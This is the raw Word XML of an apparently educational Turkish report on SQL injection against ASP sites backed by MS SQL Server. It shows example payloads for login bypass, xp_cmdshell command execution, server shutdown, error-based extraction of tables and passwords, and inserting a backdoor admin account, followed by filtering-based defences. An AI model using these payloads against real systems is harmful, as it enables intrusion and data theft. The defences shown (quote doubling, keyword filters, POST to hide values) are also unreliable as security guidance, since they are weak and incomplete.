        <w:t>Password : 208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Şeklindeki kullanıcı girdisi aşağıdaki SQL Deyimini oluştur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count(*) FROM Users WHERE Username = ’ilkay’ AND Password = ’208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İlk bakışta sorun olmayan bir SQL Deyimi... Fakat saldırganın;</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Username : ilkay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Password : ’ OR 1=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Şeklindeki girdilerle oluşturacağı SQL Deyimi ise;</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count(*) FROM Users WHERE Username = ’ilkay’ AND Password = ’’ OR 1=1 --’</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lastRenderedPageBreak/>
        <w:t>Olacaktır ki, bu durumda girişin sağlanması için şart "ilkay" kullanıcı adına ait şifrenin hiçbirşey* olması veya ikinci bir opsiyon olarak 1=1 eşitliğinin sağlanmasıd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 Hiçbişey = Boşluk</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onuç : 1=1 eşitliği sağlandığına göre saldırı başarıyla sonuçlanacak ve "Giriş Yapıldı" mesajı veril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Not : Microsoft® SQL Server™ "--" imlecinden sonra gelen yersiz kullanılmış tırnak işaretlerini göz ardı edecektir. İlk bakışta basit gibi görünen ve sadece SQL Server’a ait olan bu özellik ilerde örneklerden de anlaşılacağı üzere saldırgana büyük kolaylık sağlay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2. Uzaktan Çalıştırılması Mümkün Olan Prosedürle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S SQL Server’a varsayılan sistem hesabından yaptığımız bağlantı SQL Enjeksiyon saldırısında muhtemel saldırgana sunucuda saklanan prosedürleri çalıştırabilmesi için gerekli hakları tanıyacaktır. Saldırganın kullanabileceği prosedürlerden bir tanesi; "master..xp_cmdshell" ol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Username : ilkay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Password : ’; EXEC master..xp_cmdshell ’dir c:’--</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Girdileriyle oluşacak SQL Deyim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count(*) FROM Users WHERE Username = ’ilkay’ AND Password = ’’; EXEC master..xp_cmdshell ’dir c:’--’</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onuç : SQL Server Kullanıcıadı ve Şifreyi bulunduran sütunları arayacaktır bulamadığı için "Yanlış Kullanıcıadı &amp; Şifre" mesajını verecektir fakat bu arada arka planda "dir c:" komutunu çalıştıracak ve saldırgan C sürücüsünün içeriğine ulaş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3. SQL Server Hedef Alınarak Yapılan Saldırıla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Yönetici haklarına sahip saldırgan silme,ekleme,değiştirme...vb gibi komutları rahatlıkla çalıştırabil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HUTDOWN WITH NOWAIT SQL Server’ın kritik komutlarından bir tanesidir. Komutla beraber SQL Server görevine son ver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Username : ’; SHUTDOWN WITH NOWAIT--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Password : [Boş]</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u girdilerle oluşturulan SQL Deyim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Username FROM Users WHERE Username=’’; SHUTDOWN WITH NOWAIT; --’ AND Password=’’</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onuç : SQL Server kullanıcıadının bulunamadığı mesajını verecektir. Fakat bununla beraber arka planda diğer komutu çalıştırdığı için SQL Server kapan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4. ODBC Hatalarından Faydalanarak Yapılan Saldırıla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QL Server’ın verdiği hatalardan faydalanarak veritabanındaki neredeyse tüm bilgilere ulaşmak mümkündü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edef; http:// Victim/Default.asp?id=10 şeklinde ürün ID leri ile çalışan ASP tabanlı bir websites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lastRenderedPageBreak/>
        <w:t>Saldırı SQL Server’ın integer ve string cinsinden verileri birlikte gönderememesinden faydalınarak yapıl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Gönderilen ’10’ sayısına veritabanından herhangi bir string eklen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UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--</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Not: "INFORMATION_SCHEMA.TABLES" sistem tablosu, sistemde bulunan diğer tüm tablolar hakkında bilgi içerir. Deyimde kullanılan "TABLE_NAME" de yine tüm tablo isimlerini içer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Oluşacak SQL Deyim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TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES</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tring -&gt; Integer dönüşümünü yapamayan SQL Server aşağıdaki hatayı ver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icrosoft OLE DB Provider for ODBC Drivers error ’80040e07’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’Table1’ to a column of data type int.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>/Default.asp, line 5</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ata, saldırgana "Table1" olarak bulduğu cevabı integer a çeviremediğini (dolayısıyla veritabanındaki ilk tablo adının "Table1" olduğunu) belirtmektedir. Saldırgan diğer tabloların adını aşağıdaki şekilde öğrene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UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (’Table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Veya doğrudan LIKE komutunu kullanarak aradığı şeye daha kolay yoldan ulaş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UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ’%25Login%25’--</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QL Server’ın vereceği hat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icrosoft OLE DB Provider for ODBC Drivers error ’80040e07’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’Admin_Login’ to a column of data type int.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>/Default.asp, line 5</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Admin_Login adında bir tablo olduğunu öğrenen saldırgan muhtemelen tablodaki ilk kullanıcıadı ve şifreye ulaşmak isteyecektir. İzleyebileceği yol ise;</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UNION SELECT TOP 1 Username FROM Admin_Login--</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at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icrosoft OLE DB Provider for ODBC Drivers error ’80040e07’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’ilkay’ to a column of data type int.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>/Default.asp, line 5</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u şekilde "admin" kullanıcıadının varlığını doğrulayan saldırganın şifreyi ele geçirmek için kullanacağı gird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lastRenderedPageBreak/>
        <w:t>http:// Victim/Default.asp?id=10 UNION SELECT TOP 1 Password FROM Admin_Login WHERE Username=’ilkay’--</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at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icrosoft OLE DB Provider for ODBC Drivers error ’80040e07’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’2081’ to a column of data type int.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>/Default.asp, line 5</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onuç :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Username : ilkay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Password : 2081</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2.5. Veritabanına Ekleme Yapma veya Veri Düzenleme:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Kullanıcıadı ve şifre bilgisine ulaşan muhtemel saldırgan benzer yöntemleri ve UPDATE,INSERT komutlarını kullanarak şifreyi değiştirebilir veya daha temizi başka bir kullanıcı hesabı aç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UPDATE ’Admin_Login’ SET ’Password’ = ’NewPwd’ WHERE Username=’ilkay’--</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Yeni bir kullanıcı hesabı için;</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http:// Victim/Default.asp?id=10; INSERT INTO ’Admin_Login’ (’UserID’, ’Username’, ’Password’, ’Details’) VALUES (666,’Desperate_Cry’,’2081’,’N/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 Nasıl Korunmalı? - "Aksi Doğrulanıncaya Kadar Tüm Kullanıcı Girdileri Kötüdü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Gelebilecek SQL Enjeksiyon saldırılarından korunabilmek için alınan önlemlerde temel alınması geren nokta... "Aksi doğrulanıncaya kadar tüm kullanıcı girdileri kötüdü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1. Kullanıcı Haklarının Sınırlandırılması</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Yaygın olarak yapılan hata; Web Server dan SQL Server a yapılan bağlantılarda varsayılan sistem hesabı kullanılması... Bu şekilde yönetici haklarına sahip olan saldırgan örneklerde de görülebileceği üzere isteği komutu çalıştırıp istediği ekleme,silme,düzeltme eylemini gerçekleştirebilecektir. Bunu yerine yapılması gereken yeni bir kullanıcı hesabı oluşturup kullanıcının çalıştırabileceği komutları sınırlandırmak ol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Mesela sitenizden ürünlerinizin incelenmesine ve bunlar arasından sipariş verilmesine izin verecekseniz, "web_user" gibi bir kullanıcı adı oluşturup ürünleri incelemek için; ürünler sütununda sadece "SELECT" kullanımına ve siparişleri için; siparişler sütununda sadece "INSERT" kullanımına izin vermeniz uygun ol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2. Girdilerde Tırnak İmleçlerinin (’) Kötü Amaçlı Kullanımının Engellenmes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Yaygın SQL Enjeksiyon saldırıları SQL deyimlerinin girdilerdeki gereksiz (’) tırnak işaretleri yardımıyla yeniden oluşturulması sayesinde yapıl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Küçük bir filtreleme fonksiyonu veya tek tırnağı çift tırnağa çeviren bir fonksiyon muhtemel bir saldırıyı engellmek için yeterli ol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ASP Kullanarak girdileri kontrol ederek değiştiren bir fonksiyon kolaylıkla yazıl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lt;%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Function ReplaceQuotes(strWords)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ReplaceQuotes = Replace(strWords,”’”,”””)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>End Function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>%&gt;</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u fonksiyonu baştaki örnekte kullanırsak;</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count(*) FROM Users WHERE Username=’ilkay’ AND Password=’’ OR 1=1 --’</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şeklinde olan deyim...</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count(*) FROM Users WHERE Username=’ilkay’ AND Password=’" OR 1=1 --’</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e dönüş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3. Form Girdilerinden Gereksiz Karakterlerin Elenmes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QL Enjeksiyon saldırıları genelde ";, --,SELECT, INSERT ve xp_" gibi karakterlerin-kelimelerin kullanılmasıyla yapıldığı için gönderilecek girdinin önce bir filtreleme fonksiyonundan geçirilmesi muhtemel zayıflığı engelleyebilir.Örneğin kullanıcıdan E - Mail adresini girmesi isteniyorsa harfler ve sayıların yanında sadece " @,-,_,." karakterlerinin kullanılmasına izin verilmelid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Ve sunucuda saklanan xp_cmdshell ve xp_grantlogin gibi genel prosedürler,C/C++ tabanlı DLL ler, kullanıcı taraflı fonksiyonlar...vb, izole edilmiş bir sunucuya taşınmalıdır. Bazı zararlı kelime-harfleri filteleyen ASP fonksiyonu aşağıda örneklenmiş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lt;%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Function FilterBadWords(strWords)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>dim BadWords</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>dim NewWords</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>BadWords = array("SELECT", "DROP", ";", "--", "INSERT", "DELETE", "xp_"’)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>NewWords = strWords</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>for i = 0 to uBound(BadWords)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>NewWords = Replace(NewWords, BadWords(i), ""’)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Next</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>FilterBadWords = NewWords</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>End Function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>%&gt;</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Tırnak değiştirme fonksiyonu ve filtreleme fonksiyonu beraber kullanılırsa;</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Username FROM Users WHERE Usename=’’; EXEC master..xp_cmdshell ’dir c’; --’ AND Password=’’</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Şeklindeki SQL Deyim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SELECT Username FROM Users WHERE Usename=’" EXEC master.. cmdshell "dir c:" ’ AND Password=’’</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e dönüşecektir ki bu da herhangi bir kayıt bulumadığı hatasını vermekten öteye gitmey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u fonksiyonu kullanıcıdan gelen bütün girdilere, adres satırı ifadelerine ve çerezlerden gelen tüm veriye uygulamamız gelebilecek saldırının önüne geçecekt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4. Girdi Uzunluğunun Sınırlandırılması</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Veritabanındaki ayrılan alanın uzunluğu 10 karakterlikse, formunuzda bu alan için 50 karakter sığan bir text kutusuna sahip olmanız sakıncalı olabilir. Ve mümkün olduğu kadar girdi uzunluklarını kısa tutmak muhtemel saldırıyı engellemek için önlem sayılabili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lastRenderedPageBreak/>
        <w:t>3.5. Girdi Cinsinin Kontrol Edilmes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Formunuzdan girilen verinin istediğiniz türden bir veri olup olmadığını kontrol eden bir fonksiyon kötü amaçlı kullanımlarda saldırganın kullanabileceği harf/sayı seçeneğini kısıtlayacaktır. Mesela, eğer Ürün ID si için formunuzdan girdi alıyorsanız girdinin sayısal bir ifade olup olmadığını kontrol eden bir fonksiyon fayda sağlayacaktır.</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3.6. Girdi Cinsinin Kontrol Edilmesi</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Formunuz aracılığı ile topladığınız verileri yollarken mutlaka "POST" metodunu kullanın ki kullanıcılarınız adres çubuğunda girdikleri verilerle beraber form değerlerini gördüklerinde akıllarına farklı fikirler gelmesin.</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4. Son Söz - "Herzaman bir adım önde!"</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Aldığınız güvenlik önlemleri veya (en iyi ihtimalle) yazıp da kullanmayı bir alışkanlık haline getiremediğiniz güvenlik politikaları sizi güvenlik problemlerine karşı koruyabilir mi? Eğer güvenlik ile ilgili problemleri yönetmeyi süreç temelli bir güvenlik bilinci içerisinde ele almıyorsanız hiçbir güvenlik ürünü, bir güvenlik kaybına uğramanızı engelleyemez.</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r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Bilgi sistemleri altyapınızı taşıdıkları güvenlik zaaflarına karşı düzenli olarak kontrol ettirmek, risklerinizi takip etmek, doğru teknolojiyi doğru yerde ve doğru şekilde kullanmanızı sağlayacak güvenlik politikalarınızı oluşturup güvenlik probleminizi sürekli yönetebilecek olgunluğa ulaşmak hedeflenmelidir. Bilgi sistemlerinin önemli bir kısmını oluşturan uygulamaların taşıyabileceği güvenlik sorunları uzun süredir ihmal edilmelerinden dolayı, günümüzün en popüler sistem sızma noktalarını teşkil etmektedirler. Bu nedenle uygulama güvenliğine ilişkin gereken önemi vermeniz, güvenlik denetimi yaptırmanız ve kurumunuzun bilgi güvenliği yönetim sistemini oluşturmaya bir yerinden başlamanızı öneriyoruz.</w:t>
      </w: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Pr="00562188" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="144" w:beforeAutospacing="0" w:after="288" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562188">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>KAYNAKÇA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00562188" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="144" w:after="288"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562188">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Information Security Management Handbook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00562188" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="144" w:after="288"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId64" w:history="1">
        <w:r w:rsidRPr="00562188">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>https://www.hanci.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId65" w:history="1">
        <w:r w:rsidRPr="00562188">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00562188" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="144" w:after="288"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId66" w:history="1">
        <w:r w:rsidRPr="00562188">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>https://www.bgasecurity.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId67" w:history="1">
        <w:r w:rsidRPr="00562188">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00562188" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="144" w:after="288"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId68" w:history="1">
        <w:r w:rsidRPr="00562188">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>https://www.mediaclick.com.tr/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00562188" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="144" w:beforeAutospacing="0" w:after="288" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00462187" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pP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rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7C0D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53B592D0" wp14:editId="77CE1B63">
            <wp:extent cx="2926080" cy="3017520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="53" name="Resim 53"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Section 2.1.8-2.1.9</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F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>atih</w:t>
      </w:r>
      <w:r w:rsidRPr="007F7C0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> ALTIN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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140757015</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
